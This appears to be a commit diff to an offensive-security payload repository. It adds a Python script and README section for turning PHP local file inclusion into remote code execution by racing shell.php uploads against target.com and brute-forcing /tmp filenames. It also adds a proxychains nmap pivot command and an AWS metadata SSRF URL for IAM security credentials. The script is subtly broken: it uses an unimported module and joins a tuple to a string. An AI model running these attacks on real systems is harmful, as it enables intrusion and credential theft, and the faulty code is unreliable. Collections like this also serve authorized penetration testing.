LFI via Upload (race condition) + Network Pivot nmap

File Inclusion - Path Traversal/README.md

@@ -16,6 +16,7 @@ The File Inclusion vulnerability allows an attacker to include a file, usually e
 * [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd)
 * [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron)
 * [LFI to RCE via upload](#lfi-to-rce-via-upload)
+* [LFI to RCE via upload (race)](#lfi-to-rce-via-upload-race)
 * [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo)
 * [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file)
 * [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions)
@@ -243,6 +244,38 @@ http://example.com/index.php?page=path/to/uploaded/file.png
 
 In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf
 
+## LFI to RCE via upload (race)
+
+* Upload a file and trigger a self-inclusion.
+* Repeat 1 a shitload of time to:
+* increase our odds of winning the race
+* increase our guessing odds
+* Bruteforce the inclusion of /tmp/[0-9a-zA-Z]{6}
+* Enjoy our shell.
+
+```python
+import itertools
+import requests
+import sys
+
+print('[+] Trying to win the race')
+f = {'file': open('shell.php', 'rb')}
+for _ in range(4096 * 4096):
+    requests.post('http://target.com/index.php?c=index.php', f)
+
+
+print('[+] Bruteforcing the inclusion')
+for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
+    url = 'http://target.com/index.php?c=/tmp/php' + fname
+    r = requests.get(url)
+    if 'load average' in r.text:  # <?php echo system('uptime');
+        print('[+] We have got a shell: ' + url)
+        sys.exit(0)
+
+print('[x] Something went wrong, please try again')
+```
+
+
 ## LFI to RCE via phpinfo()
 
 https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf

File Inclusion - Path Traversal/uploadlfi.py

@@ -0,0 +1,19 @@
+import itertools
+import requests
+import sys
+
+print('[+] Trying to win the race')
+f = {'file': open('shell.php', 'rb')}
+for _ in range(4096 * 4096):
+    requests.post('http://target.com/index.php?c=index.php', f)
+
+
+print('[+] Bruteforcing the inclusion')
+for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
+    url = 'http://target.com/index.php?c=/tmp/php' + fname
+    r = requests.get(url)
+    if 'load average' in r.text:  # <?php echo system('uptime');
+        print('[+] We have got a shell: ' + url)
+        sys.exit(0)
+
+print('[x] Something went wrong, please try again')

Methodology and Resources/Network Pivoting Techniques.md

@@ -46,7 +46,7 @@ ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
 socks4 localhost 8080
 ```
 
-Set the SOCKS4 proxy then `proxychains nmap 192.168.5.6`
+Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6`
 
 ## Web SOCKS - reGeorg
 

SSRF injection/README.md

@@ -318,6 +318,7 @@ http://169.254.169.254/latest/meta-data/hostname
 http://169.254.169.254/latest/meta-data/public-keys/
 http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
 http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
+http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
 ```
 
 ### SSRF URL for Google Cloud